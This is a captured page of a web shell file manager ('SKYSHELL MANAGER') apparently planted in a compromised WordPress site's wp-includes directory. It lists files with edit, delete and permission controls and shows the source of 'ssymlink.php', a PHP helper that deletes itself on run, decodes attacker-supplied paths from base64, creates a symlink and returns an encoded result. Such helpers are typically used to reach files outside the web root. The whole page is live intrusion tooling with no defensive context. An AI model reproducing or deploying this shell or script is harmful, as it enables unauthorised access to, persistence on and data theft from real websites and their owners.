📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: ssymlink.php
<?php error_reporting(E_ALL); function softdie($txt, $ret = false){ $array = array(); $array['result'] = $txt; $array['ret'] = $ret; echo '<aefer>'.base64_encode(serialize($array)).'</aefer>';die(); } // First Delete yourself ! @unlink(__FILE__); // More has to be done here ! // CHMOD $paths = unserialize(base64_decode('[[[paths]]]')); if(!function_exists('symlink')){ softdie('NO_FUNC'); } $ret = symlink($paths['target'], $paths['link']); softdie('DONE', $ret);
Save